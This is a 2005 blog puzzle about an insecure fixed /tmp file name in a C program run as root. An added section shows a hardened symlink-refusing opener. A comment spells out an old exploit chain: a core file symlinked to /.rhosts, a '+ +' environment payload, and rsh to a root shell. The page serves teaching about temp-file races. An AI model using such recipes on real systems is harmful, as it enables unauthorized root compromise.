Friday, April 15, 2005

The temporary one!

#include <stdio.h>

int main(void)
{
    /* Fixed, predictable file name under the shared /tmp directory */
    FILE *fh = fopen("/tmp/ABC_my_junk_spot", "w+");
    if (fh == NULL)
        return 1;
    fprintf(fh, "hello..what are you looking at?");
    fclose(fh);
    return 0;
}

Find out what is wrong with this piece of code.
How would you exploit this to gain root access if this code runs as root?
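Added example, not code from the original post: the post's fopen("w+") pattern beside a hardened opener that refuses to follow a pre-existing file or link, run in a scratch directory so the difference is visible. The helper names, the scratch directory and the "victim" target path are my own assumptions.

```c
/* Added example, not from the original post.  The post's fopen("w+") at a
 * fixed /tmp name follows whatever already sits there, so a planted symlink
 * redirects a root-owned write.  Opening with O_EXCL|O_NOFOLLOW refuses a
 * pre-existing file or link instead of following it. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

static const char MSG[] = "hello..what are you looking at?";

/* The post's pattern: truncate-or-create at a fixed path, symlinks followed. */
static int write_tmp_vulnerable(const char *path) {
    FILE *fh = fopen(path, "w+");
    if (fh == NULL) return -1;
    fputs(MSG, fh);
    return fclose(fh);
}

/* Hardened: create only if nothing is there and never follow a symlink.
 * open() then fails with EEXIST or ELOOP; treat that as tampering, not as
 * something to retry with a different flag. */
static int write_tmp_safe(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    ssize_t n = write(fd, MSG, sizeof MSG - 1);
    close(fd);
    return n == (ssize_t)(sizeof MSG - 1) ? 0 : -1;
}

/* Scratch-directory demonstration (constructed paths): plant a symlink at
 * the "junk spot" and see which writer is redirected through it.  Returns 1
 * when the vulnerable writer followed the link (the target appeared), the
 * hardened writer refused it, and the hardened writer succeeds once clean. */
static int demo(void) {
    char dir[] = "/tmp/junkdemo.XXXXXX", spot[256], target[256];
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(spot, sizeof spot, "%s/ABC_my_junk_spot", dir);
    snprintf(target, sizeof target, "%s/victim", dir);
    if (symlink(target, spot) != 0) return -1;
    int vuln = write_tmp_vulnerable(spot);    /* 0: wrote through the link */
    int followed = access(target, F_OK) == 0; /* the victim file now exists */
    int safe = write_tmp_safe(spot);          /* -1: open() refused the link */
    unlink(spot);                             /* remove the planted link */
    int clean = write_tmp_safe(spot);         /* 0: fresh file, O_EXCL ok */
    unlink(spot); unlink(target); rmdir(dir);
    return (vuln == 0 && followed && safe == -1 && clean == 0) ? 1 : 0;
}
```

mkstemp(3), which creates the file with O_EXCL under an unpredictable name, is the usual way to drop the fixed path altogether.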

PS: The bar girls are like /tmp because
1. They are public property
2. They talk too much

4 comments:

SG said...

Very true.
It may be a local compromise but not a remote one.

--Alpha0

SG said...

I don't think we can control the behavior of printf.

You remember an old trick:
(Earlier all cores dumped by applications having suid as root were owned by root.)

$ln -s /.rhosts core
$BOB42="

+ +

"
$export BOB42

Now get the core dumped by killing some suid root process, for example 'ping'.
And here is your chocolate:
$rsh -l root localhost /bin/sh -i

Njoy.

SG said...

In a similar manner you can exploit the code given in the problem.